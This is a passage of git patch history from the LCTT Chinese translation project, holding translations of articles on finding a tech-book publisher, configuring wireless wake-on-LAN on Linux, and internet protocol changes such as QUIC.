+[14]:https://www.cyberciti.biz/tips/bash-aliases-mac-centos-linux-unix.html +[15]:https://www.cyberciti.biz/faq/bash-shell-temporarily-disable-an-alias/ +[16]:https://github.com/kjetilho/clumsy_protect +[17]:https://twitter.com/nixcraft +[18]:https://facebook.com/nixcraft +[19]:https://plus.google.com/+CybercitiBiz From 681effd067c42f5201fa7e2115a0553d283b7fec Mon Sep 17 00:00:00 2001 From: FelixYFZ <33593534+FelixYFZ@users.noreply.github.com> Date: Sat, 16 Dec 2017 21:27:56 +0800 Subject: [PATCH 0631/1627] Create 20171201 How to find a publisher for your tech book.md --- ... to find a publisher for your tech book.md | 84 +++++++++++++++++++ 1 file changed, 84 insertions(+) create mode 100644 translated/tech/20171201 How to find a publisher for your tech book.md diff --git a/translated/tech/20171201 How to find a publisher for your tech book.md b/translated/tech/20171201 How to find a publisher for your tech book.md new file mode 100644 index 0000000000..8ac4cf4001 --- /dev/null +++ b/translated/tech/20171201 How to find a publisher for your tech book.md @@ -0,0 +1,84 @@ +Translated by FelixYFZ + +如何为你的科技书籍找到出版商 +============================================================ + +### 想去写一本科技书籍是一个好的想法,但你还需要去了解一下出版业的运作过程。 + +![How to find a publisher for your tech book](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDUCATION_colorbooks.png?itok=vNhsYYyC "How to find a publisher for your tech book") +Image by : opensource.com + +你已经有了一个写一本科技书籍的想法,祝贺你!就像徒步旅行一样,或者是去学做一种甜点心,写一本书就像人们讨论的那些事情中一种, +但是却都只停留在思考的初级阶段。 那是可以理解的,因为失败的几率是很高的。要想实现它你需要在把你的想法阐述给出版商,去探讨是否已经准备充分去写成一本书。要去实现这一步是相当困难的,但最困难的是你将缺少足够的资源信息来完成它。如果你想和一个传统的出版商合作,你需要在他们面前推销你的书籍以期望能够得到出版的机会。我是Pragmatci Bookshelf的编辑主管,所以我经常看到很多的提案,也去帮助作者提议更好的主意。 有些是好的,有些则不然,但我经常会看到许多不符合我们出版社风格的文稿。我会帮助你去选择最适合的出版商,来让你的想法得到认可。 + +### 鉴别出你的目标 + +你的第一步是要找出最适合你的想法的出版商。你可以从你较喜欢购买的书籍的出版商开始,你的书会被像你自己一样的人喜欢的几率是很高的,所以从你自己最喜欢的开始将会大大缩小你的查搜素范围。如果你自己所买的书籍并不多。你可以去书店逛逛,或者在亚马逊网站上看看。 列一个你自己喜欢的的出版商的清单出来 +Next, winnow your prospects. Although most technical publishers look alike from a distance, they often have +下一步,挑选出你期望的,尽管大多数技术类出版商看起来没什么差别, +distinctive audiences. Some publishers go for broadly popular topics, such as C++ or Java. Your book on Elixir may +他们通常各有不同的读者群体。有些出版商会选择广受欢迎的话题,如C++或者Java. 你以Elixir为主题的就可能不适合那个出版商。 +not be a good fit for that publisher. If your prospective book is about teaching programming to kids, you probably +如果你的书是关于教授小孩学习编程的, +don't want to go with the traditional academic publisher. +你可能就不想让学术出版商来出版。 +Once you've identified a few targets, do some more research into the publishers' catalogs, either on their own +一旦你已经鉴别出一些目标,在他们自己的网站或者亚马逊上对他们进行深一步的调查。 +site, or on Amazon. See what books they have that are similar to your idea. If they have a book that's identical, + 去寻找他们有哪些书籍是和你的思想是相符的。如果他们能有一本和你自己的思想相符合或很相近的书, +or nearly so, you'll have a tough time convincing them to sign yours. That doesn't necessarily mean you should drop +你将会很难说服他们和你签约。但那并不意味着你已经可以把这样的出版商从你的列表中划掉。 +that publisher from your list. You can make some changes to your proposal to differentiate it from the existing +你可以将你的书籍的主题进行适当的修改以将它和已经发行的书区别开来:比如定位于不同的读者群体,或者不同层次的技能水平。也许已发行的那本书已经过时了,你就可以专注于在技术领域的新的方法。确保你的书籍能够弥补现有书的不足,更加完善,而不只是去写完这本书。 +book: target a different audience, or a different skill level. Maybe the existing book is outdated, and you could focus on new approaches to the technology. Make your proposal into a book that complements the existing one, rather than competes. + +If your target publisher has no books that are similar, that can be a good sign, or a very bad one. Sometimes +如果你锁定的出版商没有出版过类似的书籍,也许这将会是个好的机遇,但也许也会很糟糕。有时候一些供应商不会选择去出版一些专业技术方面 +publishers choose not to publish on specific technologies, either because they don't believe their audience is +的书籍,或者是因为他们认为他们的读者不会感兴趣,还可能是因为他们曾经在这块领域遇到过麻烦。 +interested, or they've had trouble with that technology in the past. New languages and libraries pop up all the +新的语言文学或者图书一直在不停的涌现出来,出版商们不得不去琢磨什么样的书籍内容将会吸引他们读者群体。 +time, and publishers have to make informed guesses about which will appeal to their readers. Their assessment may + +not be the same as yours. Their decision might be final, or they might be waiting for the right proposal. The only +他们的评估标准可能和你的是不以一样的。唯一的途径是通过投稿来试探。 +way to know is to propose and find out. + +### 建立起你自己的网络 + +Identifying a publisher is the first step; now you need to make contact. Unfortunately, publishing is still +鉴别出一家出版商是第一步;现在你首先需要去建立联系。不幸的是,你认识出版商的什么职位的人永远比任何其他的更重要。 +about  _who_  you know, more than  _what_  you know. The person you want to know is an  _acquisitions editor,_  the +你最想认识的那个人是一个去发现新市场,新作者和新提议的组稿编辑。如果你认识某个和出版商有关系的人,请求他帮你介绍认识一位组稿编辑。 +editor whose job is to find new markets, authors, and proposals. If you know someone who has connections with a publisher, ask for an introduction to an acquisitions editor. These editors often specialize in particular subject +这些组稿编辑往往负责一个专题板块,尤其是在较大的出版商,但你不必一定要找到符合你的书的专题板块的编辑。任何板块编辑通常会很乐意将你介绍给符合你的主题的编辑。有时候你也许能够在一个技术论坛展会上发现一个组稿编辑,特别是主办者是出版商,而且还有一个展台, +即使在在当时并没有一个组稿编辑在场,在展台的其他员工也能够帮你和组稿编辑建立联系。 如果这个论坛不符合你的主题思想, 你需要利用你 +的社交网络来获得别人的推荐。使用LinkedIn,或者其他非正式的联系方式,去和一个编辑建立联系。对于小型的出版商,如果你很幸运的话,你可以在他们的公司网站上获得组稿编辑的联系方式。如果找不到联系方式的话,在推特上搜寻出版商的名字,试试能否找到他们的组稿编辑的信息,在社交媒体上去寻找一位陌生的人然后把自己当书推荐给他也许会让你有些紧张担心,但是你真的不必去担心这些,建立联系也是组稿编辑的工作之一 +最坏的结果就是他们忽视你而已。 +一旦你建立起联系,组稿编辑将会协助你进行下一步。他们可能会很快对你的书稿给予反馈,或者在他们考虑你的书之前想让你根据他们的指导来修改你的文章,当你经过努力找到了一名组稿编辑后,多听从他们的建议,因为他们比你更熟悉出版商的运作系统。 + +### 如果其他的方法都失败了 +如果你无法找到一名组稿编辑,出版商通常会有一个匿名提案的方式,通常是`proposals@[publisher].com`的格式。 查找他们网站的介绍如何去发送一个匿名提案;有的出版商是有特殊的要求的。遵循他们的要求,如果把你不这样做的话,你的书将会被丢弃不会被任何人阅读。如果你有疑问,或者不确定出版商的意图,你需要再尝试着去找一名组稿编辑进一步的沟通,因为匿名提案并不能得到你想要的答复,整理他们对你的要求(一篇独立的主题文章)发给他们,然后就去期望能够得到满意的答复。 + +### 然后就是......等待 +无论你和一个出版商有着多么密切的联系,你也将不得不等待着,如果你已经投递了书稿,也许要过一段时间才有有人去处理你的稿件,特别是在一些大公司。即使你已经找了一位选稿编辑去处理你的投稿,你可能也只是他同时在处理的潜在顾客之一,所以你可能不会很快得到答复,几乎所有的出版商都会在最终确认之前召开一次组委会,所以即使你的书稿已经足够的优秀可以出版了,你也任然需要等待组委会的最后探讨。你可能需要等待几周的时间,甚至是一个月的时间。几周过后,你可以和编辑联系一下看看他们是否需要更多的信息。在邮件中你要表现出足够的礼貌;如果他们任然没有回复你也许是因为他们有太多的投稿需要处理,即使你不停的催促也不会让你的稿件被提前处理。一些出版商有可能永远不会回复你也不会去发一份退稿的通知给你,但那种情况并不常见。在这种情况系你除了耐心的等待也没有别的办法,如果几个月后也没有人回复你邮件,你完全可以去接触另一个出版商或者干脆考虑自己来出版。 + +### 好运气 +如果这个过程看起来让你感觉有些混乱和不科学,这是很正常的。能够得到出版要依靠合适的地方,合适的时间,和合适的人探讨,而且还要期待他们 +此时有好的心情。你无法去控制这些不确定的因素,但是对出版社运作过程的熟悉,了解出版商们的需求,能够帮助你做出一个自己能掌控的最佳选择。寻找一个出版商只是万里长征的第一步。你需要提炼你的想法并创建提案,以及其他方面的考虑。在今年的SeaGLS上,有一个对整个过程的介绍指导。去看看那个视屏获得更多的细节信息。 + +### 关于作者 + [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/portrait.jpg?itok=b77dlNC4)][7] +麦克唐纳-麦克唐纳先生现在在Pragmatic Bookshelf主管编辑。在过去的20年里,在科学技术领域,他是一名编辑,一名作者,偶尔还去做演讲者 +或者训练师。他现在把大量的时间都用来去和新作者探讨如何能都更好的表达出他们的想法。你可以关注他的推特@bmac_editor. +[More about me][2] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/12/how-find-publisher-your-book + +作者:[Brian MacDonald ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From b3a490e09c7fb327cc455e17e65ff487ebd1ef46 Mon Sep 17 00:00:00 2001 From: FelixYFZ <33593534+FelixYFZ@users.noreply.github.com> Date: Sat, 16 Dec 2017 21:29:38 +0800 Subject: [PATCH 0632/1627] Delete 20171201 How to find a publisher for your tech book.md --- ... to find a publisher for your tech book.md | 78 ------------------- 1 file changed, 78 deletions(-) delete mode 100644 sources/tech/20171201 How to find a publisher for your tech book.md diff --git a/sources/tech/20171201 How to find a publisher for your tech book.md b/sources/tech/20171201 How to find a publisher for your tech book.md deleted file mode 100644 index 6c7cfeecc1..0000000000 --- a/sources/tech/20171201 How to find a publisher for your tech book.md +++ /dev/null @@ -1,78 +0,0 @@ - -Translating by FelixYFZ -How to find a publisher for your tech book -============================================================ - -### Writing a technical book takes more than a good idea. You need to know a bit about how the publishing industry works. - - -![How to find a publisher for your tech book](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDUCATION_colorbooks.png?itok=vNhsYYyC "How to find a publisher for your tech book") -Image by : opensource.com - -You've got an idea for a technical book—congratulations! Like a hiking the Appalachian trail, or learning to cook a soufflé, writing a book is one of those things that people talk about, but never take beyond the idea stage. That makes sense, because the failure rate is pretty high. Making it real involves putting your idea in front of a publisher, and finding out whether it's good enough to become a book. That step is scary enough, but the lack of information about how to do it complicates matters. - -If you want to work with a traditional publisher, you'll need to get your book in front of them and hopefully start on the path to publication. I'm the Managing Editor at the [Pragmatic Bookshelf][4], so I see proposals all the time, as well as helping authors to craft good ones. Some are good, others are bad, but I often see proposals that just aren't right for Pragmatic. I'll help you with the process of finding the right publisher, and how to get your idea noticed. - -### Identify your target - -Your first step is to figure out which publisher is the a good fit for your idea. To start, think about the publishers that you buy books from, and that you enjoy. The odds are pretty good that your book will appeal to people like you, so starting with your favorites makes for a pretty good short list. If you don't have much of a book collection, you can visit a bookstore, or take a look on Amazon. Make a list of a handful of publishers that you personally like to start with. - -Next, winnow your prospects. Although most technical publishers look alike from a distance, they often have distinctive audiences. Some publishers go for broadly popular topics, such as C++ or Java. Your book on Elixir may not be a good fit for that publisher. If your prospective book is about teaching programming to kids, you probably don't want to go with the traditional academic publisher. - -Once you've identified a few targets, do some more research into the publishers' catalogs, either on their own site, or on Amazon. See what books they have that are similar to your idea. If they have a book that's identical, or nearly so, you'll have a tough time convincing them to sign yours. That doesn't necessarily mean you should drop that publisher from your list. You can make some changes to your proposal to differentiate it from the existing book: target a different audience, or a different skill level. Maybe the existing book is outdated, and you could focus on new approaches to the technology. Make your proposal into a book that complements the existing one, rather than competes. - -If your target publisher has no books that are similar, that can be a good sign, or a very bad one. Sometimes publishers choose not to publish on specific technologies, either because they don't believe their audience is interested, or they've had trouble with that technology in the past. New languages and libraries pop up all the time, and publishers have to make informed guesses about which will appeal to their readers. Their assessment may not be the same as yours. Their decision might be final, or they might be waiting for the right proposal. The only way to know is to propose and find out. - -### Work your network - -Identifying a publisher is the first step; now you need to make contact. Unfortunately, publishing is still about  _who_  you know, more than  _what_  you know. The person you want to know is an  _acquisitions editor,_  the editor whose job is to find new markets, authors, and proposals. If you know someone who has connections with a publisher, ask for an introduction to an acquisitions editor. These editors often specialize in particular subject areas, particularly at larger publishers, but you don't need to find the right one yourself. They're usually happy to connect you with the correct person. - -Sometimes you can find an acquisitions editor at a technical conference, especially one where the publisher is a sponsor, and has a booth. Even if there's not an acquisitions editor on site at the time, the staff at the booth can put you in touch with one. If conferences aren't your thing, you'll need to work your network to get an introduction. Use LinkedIn, or your informal contacts, to get in touch with an editor. - -For smaller publishers, you may find acquisitions editors listed on the company website, with contact information if you're lucky. If not, search for the publisher's name on Twitter, and see if you can turn up their editors. You might be nervous about trying to reach out to a stranger over social media to show them your book, but don't worry about it. Making contact is what acquisitions editors do. The worst-case result is they ignore you. - -Once you've made contact, the acquisitions editor will assist you with the next steps. They may have some feedback on your proposal right away, or they may want you to flesh it out according to their guidelines before they'll consider it. After you've put in the effort to find an acquisitions editor, listen to their advice. They know their system better than you do. - -### If all else fails - -If you can't find an acquisitions editor to contact, the publisher almost certainly has a blind proposal alias, usually of the form `proposals@[publisher].com`. Check the web site for instructions on what to send to a proposal alias; some publishers have specific requirements. Follow these instructions. If you don't, you have a good chance of your proposal getting thrown out before anybody looks at it. If you have questions, or aren't sure what the publisher wants, you'll need to try again to find an editor to talk to, because the proposal alias is not the place to get questions answered. Put together what they've asked for (which is a topic for a separate article), send it in, and hope for the best. - -### And ... wait - -No matter how you've gotten in touch with a publisher, you'll probably have to wait. If you submitted to the proposals alias, it's going to take a while before somebody does anything with that proposal, especially at a larger company. Even if you've found an acquisitions editor to work with, you're probably one of many prospects she's working with simultaneously, so you might not get rapid responses. Almost all publishers have a committee that decides on which proposals to accept, so even if your proposal is awesome and ready to go, you'll still need to wait for the committee to meet and discuss it. You might be waiting several weeks, or even a month before you hear anything. - -After a couple of weeks, it's fine to check back in with the editor to see if they need any more information. You want to be polite in this e-mail; if they haven't answered because they're swamped with proposals, being pushy isn't going to get you to the front of the line. It's possible that some publishers will never respond at all instead of sending a rejection notice, but that's uncommon. There's not a lot to do at this point other than be patient. Of course, if it's been months and nobody's returning your e-mails, you're free to approach a different publisher or consider self-publishing. - -### Good luck - -If this process seems somewhat scattered and unscientific, you're right; it is. Getting published depends on being in the right place, at the right time, talking to the right person, and hoping they're in the right mood. You can't control all of those variables, but having a better knowledge of how the industry works, and what publishers are looking for, can help you optimize the ones you can control. - -Finding a publisher is one step in a lengthy process. You need to refine your idea and create the proposal, as well as other considerations. At SeaGL this year [I presented][5] an introduction to the entire process. Check out [the video][6] for more detailed information. - -### About the author - - [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/portrait.jpg?itok=b77dlNC4)][7] - - Brian MacDonald - Brian MacDonald is Managing Editor at the Pragmatic Bookshelf. Over the last 20 years in tech publishing, he's been an editor, author, and occasional speaker and trainer. He currently spends a lot of his time talking to new authors about how they can best present their ideas. You can follow him on Twitter at @bmac_editor.[More about me][2] - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/12/how-find-publisher-your-book - -作者:[Brian MacDonald ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/bmacdonald -[1]:https://opensource.com/article/17/12/how-find-publisher-your-book?rate=o42yhdS44MUaykAIRLB3O24FvfWxAxBKa5WAWSnSY0s -[2]:https://opensource.com/users/bmacdonald -[3]:https://opensource.com/user/190176/feed -[4]:https://pragprog.com/ -[5]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook -[6]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook -[7]:https://opensource.com/users/bmacdonald -[8]:https://opensource.com/users/bmacdonald -[9]:https://opensource.com/users/bmacdonald -[10]:https://opensource.com/article/17/12/how-find-publisher-your-book#comments From 047a48b4e9243fd52e9239512aa5d1d7034b38fa Mon Sep 17 00:00:00 2001 From: imquanquan Date: Sat, 16 Dec 2017 22:20:43 +0800 Subject: [PATCH 0633/1627] translating by imquanquan --- ...ul GNOME Shell Keyboard Shortcuts You Might Not Know About.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md b/sources/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md index 17f657647d..ee9abe0576 100644 --- a/sources/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md +++ b/sources/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md @@ -1,3 +1,4 @@ +translating by imquanquan Useful GNOME Shell Keyboard Shortcuts You Might Not Know About ====== As Ubuntu has moved to Gnome Shell in its 17.10 release, many users may be interested to discover some of the most useful shortcuts in Gnome as well as how to create your own shortcuts. This article will explain both. From 5be1464975a597fa80db0168f5012c466a9080a3 Mon Sep 17 00:00:00 2001 From: wxy Date: Sat, 16 Dec 2017 22:38:51 +0800 Subject: [PATCH 0634/1627] PRF&PUB:20171212 Internet protocols are changing.md @lujun9972 --- ...ireless wake-on-lan for Linux WiFi card.md | 149 ++++++++++++++++++ ...ireless wake-on-lan for Linux WiFi card.md | 116 -------------- 2 files changed, 149 insertions(+), 116 deletions(-) create mode 100644 published/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md delete mode 100644 translated/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md diff --git a/published/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md b/published/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md new file mode 100644 index 0000000000..da7f1f55c0 --- /dev/null +++ b/published/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md @@ -0,0 +1,149 @@ +如何为 Linux 无线网卡配置无线唤醒功能 +====== + +我有一台用于备份我的所有设备的网络存储(NAS)服务器。然而当我备份我的 Linux 笔记本时遇到了困难。当它休眠或挂起时我不能备份它。当我使用基于 Intel 的无线网卡时,我可以配置笔记本上的 WiFi 接受无线唤醒吗? + +[网络唤醒][2]Wake-on-LAN(WOL)是一个以太网标准,它允许服务器通过一个网络消息而被打开。你需要发送一个“魔法数据包”到支持网络唤醒的以太网卡和主板,以便打开被唤醒的系统。 + +[![linux-configire-wake-on-wireless-lan-wowlan][1]][1] + +无线唤醒wireless wake-on-lan(WoWLAN 或 WoW)允许 Linux 系统进入低耗电模式的情况下保持无线网卡处于激活状态,依然与热点连接。这篇教程演示了如何在一台安装无线网卡的 Linux 笔记本或桌面电脑上启用 WoWLAN / WoW 模式。 + +> 请注意,不是所有的无线网卡和 Linux 驱动程序都支持 WoWLAN。 + +### 语法 + +在 Linux 系统上,你需要使用 `iw` 命令来查看和操作无线设备及其配置。 其格式为: + +``` +iw command +iw [options] command +``` + +### 列出所有的无线设备及其功能 + +输入下面命令: + +``` +$ iw list +$ iw list | more +$ iw dev +``` + +输出为: + +``` +phy#0 + Interface wlp3s0 + ifindex 3 + wdev 0x1 + addr 6c:88:14:ff:36:d0 + type managed + channel 149 (5745 MHz),width: 40 MHz, center1: 5755 MHz + txpower 15.00 dBm +``` + +请记下这个 `phy0`。 + +### 查看无线唤醒的当前状态 + +打开终端并输入下面命令来查看无线网络的状态: + +``` +$ iw phy0 wowlan show +``` + +输出为: + +``` +WoWLAN is disabled +``` + +### 如何启用无线唤醒 + +启用的语法为: + +`sudo iw phy {phyname} wowlan enable {option}` + +其中, + +1. `{phyname}` - 使用 `iw dev` 来获取其物理名。 +2. `{option}` - 可以是 `any`、`disconnect`、`magic-packet` 等。 + +比如,我想为 `phy0` 开启无线唤醒: + +``` +$ sudo iw phy0 wowlan enable any +``` +或者: + +``` +$ sudo iw phy0 wowlan enable magic-packet disconnect +``` + +检查一下: + +``` +$ iw phy0 wowlan show +``` + +结果为: + +``` +WoWLAN is enabled: + * wake up on disconnect + * wake up on magic packet +``` + +### 测试一下 + +将你的笔记本挂起或者进入休眠模式: + +``` +$ sudo sh -c 'echo mem > /sys/power/state' +``` + +从 NAS 服务器上使用 [ping 命令][3] 发送 ping 请求 + +``` +$ ping your-laptop-ip +``` + +也可以 [使用 `wakeonlan` 命令发送魔法数据包][4]: + +``` +$ wakeonlan laptop-mac-address-here +$ etherwake MAC-Address-Here +``` + +### 如何禁用无线唤醒? + +语法为: + +``` +$ sudo phy {phyname} wowlan disable +$ sudo phy0 wowlan disable +``` + +更多信息请阅读 `iw` 命令的 man 页: + +``` +$ man iw +$ iw --help +``` + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/faq/configure-wireless-wake-on-lan-for-linux-wifi-wowlan-card/ + +作者:[Vivek Gite][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://twitter.com/nixcraft +[1]: https://www.cyberciti.biz/media/new/faq/2017/12/linux-configire-wake-on-wireless-lan-wowlan.jpg +[2]: https://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html +[3]: https://www.cyberciti.biz/faq/unix-ping-command-examples/ (See Linux/Unix ping command examples for more info) +[4]: https://www.cyberciti.biz/faq/apple-os-x-wake-on-lancommand-line-utility/ diff --git a/translated/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md b/translated/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md deleted file mode 100644 index a9b58edbd8..0000000000 --- a/translated/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md +++ /dev/null @@ -1,116 +0,0 @@ -如何为 Linux 无线网卡配置无线唤醒功能 -====== -[![linux-configire-wake-on-wireless-lan-wowlan][1]][1] -无线唤醒 (WoWLAN or WoW) 允许 Linux 系统进入低耗电模式的情况下保持无线网卡处于激活状态依然与热点连接。这篇教程演示了如何在一台安装无线网卡的 Linux 笔记本或桌面电脑上启用 WoWLAN / WoW 模式。 - -请注意,不是所有的无线网卡和 Linux 驱动程序都支持 WoWLAN。 - -## 语法 - -在 Linux 系统上,你需要使用 iw 命令来查看和操作无线设备及其配置。 其 syntax 为: -``` -iw command -iw [options] command -``` - -## 列出所有的无线设备及其功能 - -输入下面命令: -``` -$ iw list -$ iw list | more -$ iw dev -``` -输出为: -``` -phy#0 - Interface wlp3s0 - ifindex 3 - wdev 0x1 - addr 6c:88:14:ff:36:d0 - type managed - channel 149 (5745 MHz),width: 40 MHz, center1: 5755 MHz - txpower 15.00 dBm - -``` - -请记下这个 phy0。 - -## 查看 wowlan 的当前状态 - -打开终端并输入下面命令来查看无线网络的状态: -``` -$ iw phy0 wowlan show -``` -输出为: -``` -WoWLAN is disabled -``` - -## 如何启用 wowlan - -启用的语法为: -`sudo iw phy {phyname} wowlan enable {option}` -其中, - - 1。{phyname} - 使用 iw dev 来获取 phy 的名字。 - 2。{option} - 可以是 any, disconnect, magic-packet 等。 - - - -比如,我想为 phy0 开启 wowlan: -`$ sudo iw phy0 wowlan enable any` -或者 -`$ sudo iw phy0 wowlan enable magic-packet disconnect` -检查一下: -`$ iw phy0 wowlan show` -结果为: -``` -WoWLAN is enabled: - * wake up on disconnect - * wake up on magic packet - -``` - -## 测试一下 - -将你的笔记本挂起或者进入休眠模式,然后从 NAS 服务器上发送 ping 请求或 magic packet: -`$ sudo sh -c 'echo mem > /sys/power/state'` -从 NAS 服务器上使用 [ping command][3] 发送 ping 请求 -`$ ping your-laptop-ip` -也可以 [使用 wakeonlan 命令发送 magic packet][4]: -``` -$ wakeonlan laptop-mac-address-here -$ etherwake MAC-Address-Here -``` - -## 如何禁用 WoWLAN? - -语法为: -``` -$ sudo phy {phyname} wowlan disable -$ sudo phy0 wowlan disable -``` - -更多信息请阅读 iw 命令的 man 页: -``` -$ man iw -$ iw --help -``` - - --------------------------------------------------------------------------------- - -via: https://www.cyberciti.biz/faq/configure-wireless-wake-on-lan-for-linux-wifi-wowlan-card/ - -作者:[Vivek Gite][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://twitter.com/nixcraft -[1] https://www.cyberciti.biz/media/new/faq/2017/12/linux-configire-wake-on-wireless-lan-wowlan.jpg -[2] https://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html -[3] //www.cyberciti.biz/faq/unix-ping-command-examples/ (See Linux/Unix ping command examples for more info) -[4] https://www.cyberciti.biz/faq/apple-os-x-wake-on-lancommand-line-utility/ From 7c3c78e8bb15610b26adce4e71fdce75793944eb Mon Sep 17 00:00:00 2001 From: wxy Date: Sat, 16 Dec 2017 22:39:55 +0800 Subject: [PATCH 0635/1627] PRF:20171212 Internet protocols are changing.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 部分校对 --- ...20171212 Internet protocols are changing.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/translated/tech/20171212 Internet protocols are changing.md b/translated/tech/20171212 Internet protocols are changing.md index feb3694105..1d198e2736 100644 --- a/translated/tech/20171212 Internet protocols are changing.md +++ b/translated/tech/20171212 Internet protocols are changing.md @@ -59,23 +59,23 @@ TLS 1.3 并不支持那些窃听通讯的特定技术,因为那也是 [一种 #### QUIC -在 HTTP/2 工作期间,可以很明显地看到 TCP 是很低效率的。因为 TCP 是一个按顺序发送的协议,丢失的包阻止了在缓存中的后面等待的包被发送到应用程序。对于一个多路协议来说,这对性能有很大的影响。 +在 HTTP/2 工作中,可以很明显地看到 TCP 有相似的低效率。因为 TCP 是一个按顺序发送的协议,一个数据包的丢失可能阻止其后面缓存区中的数据包被发送到应用程序。对于一个多路复用协议来说,这对性能有很大的影响。 -[QUIC][23] 是尝试去解决这种影响而在 UDP 之上重构的 TCP 语义(属于 HTTP/2 的流模型的一部分)像 HTTP/2 一样,它作为 Google 的一项成果被发起,并且现在已经进入了 IETF,它最初是作为一个 HTTP-over-UDP 的使用案例,并且它的目标是在 2018 年成为一个标准。但是,因为 Google 在 Chrome 浏览器和它的网站上中已经部署了 QUIC,它已经占有了互联网通讯超过 7% 的份额。 +[QUIC][23] 尝试去解决这种影响而在 UDP 之上重构了 TCP 语义(以及 HTTP/2 流模型的一部分)。像 HTTP/2 一样,它始于 Google 的一项成果,并且现在已经被 IETF 接纳作为一个 HTTP-over-UDP 的初始用例,其目标是在 2018 年底成为一个标准。然而,因为 Google 已经在 Chrome 浏览器及其网站上部署了 QUIC,它已经占有了超过 7% 的互联网通讯份额。 -阅读 [关于 QUIC 的答疑][24] +- 阅读 [关于 QUIC 的答疑][24] -除了大量的通讯(以及隐含的可能的网络调整)从 TCP 到 UDP 的转变之外,Google QUIC(gQUIC)和 IETF QUIC(iQUIC)都要求完全加密;这里没有非加密的 QUIC。 +除了大量的通讯从 TCP 到 UDP 的转变(以及隐含的可能的网络调整)之外,Google QUIC(gQUIC)和 IETF QUIC(iQUIC)都要求全程加密;并没有非加密的 QUIC。 -iQUIC 使用 TLS 1.3 去为一个会话创建一个密码,然后使用它去加密每个包。然而,因为,它是基于 UDP 的,在 QUIC 中许多会话信息和元数据在加密后的 TCP 包中被公开。 +iQUIC 使用 TLS 1.3 来为会话建立密钥,然后使用它去加密每个数据包。然而,由于它是基于 UDP 的,许多 TCP 中公开的会话信息和元数据在 QUIC 中被加密了。 -事实上,iQUIC 当前的 [‘短报文头’][25] — 被用于除了握手外的所有包 — 仅公开一个包编号、一个可选的连接标识符、和一个状态字节,像加密密钥转换计划和包字节(它最终也可能被加密)。 +事实上,iQUIC 当前的 [‘短报文头’][25] 被用于除了握手外的所有包,仅公开一个包编号、一个可选的连接标识符和一个状态字节,像加密密钥轮换计划和包字节(它最终也可能被加密)。 -其它的所有东西都被加密 — 包括 ACKs,以提高 [通讯分析][26] 攻击的门槛。 +其它的所有东西都被加密 —— 包括 ACK,以提高 [通讯分析][26] 攻击的门槛。 -然而,这意味着被动估算 RTT 和通过观察连接的丢失包将不再变得可能;因为这里没有足够多的信息了。在一些运营商中,由于缺乏可观测性,导致了大量的担忧,它们认为像这样的被动测量对于他们调试和了解它们的网络是至关重要的。 +然而,这意味着通过观察连接来被动估算 RTT 和包丢失率将不再变得可行;因为没有足够多的信息。在一些运营商中,由于缺乏可观测性,导致了大量的担忧,它们认为像这样的被动测量对于他们调试和了解它们的网络是至关重要的。 -为满足这一需求,它们有一个提议是 ‘[Spin Bit][27]‘ — 在报文头中的一个 bit,它是一个往返的开关,因此,可能通过观察它来估算 RTT。因为,它从应用程序的状态中解耦的,它的出现并不会泄露关于终端的任何信息,也无法实现对网络位置的粗略估计。 +为满足这一需求,它们有一个提议是 ‘[Spin Bit][27]’ — 这是在报文头中的一个回程翻转的位,因此,可能通过观察它来估算 RTT。因为,它从应用程序的状态中解耦的,它的出现并不会泄露关于终端的任何信息,也无法实现对网络位置的粗略估计。 #### DOH From d880b931e4d634eab15c9b1c3a36e4601e99c5d0 Mon Sep 17 00:00:00 2001 From: wxy Date: Sat, 16 Dec 2017 22:58:53 +0800 Subject: [PATCH 0636/1627] Revert "PRF&PUB:20171212 Internet protocols are changing.md" This reverts commit 5be1464975a597fa80db0168f5012c466a9080a3. --- ...ireless wake-on-lan for Linux WiFi card.md | 149 ------------------ ...ireless wake-on-lan for Linux WiFi card.md | 116 ++++++++++++++ 2 files changed, 116 insertions(+), 149 deletions(-) delete mode 100644 published/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md create mode 100644 translated/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md diff 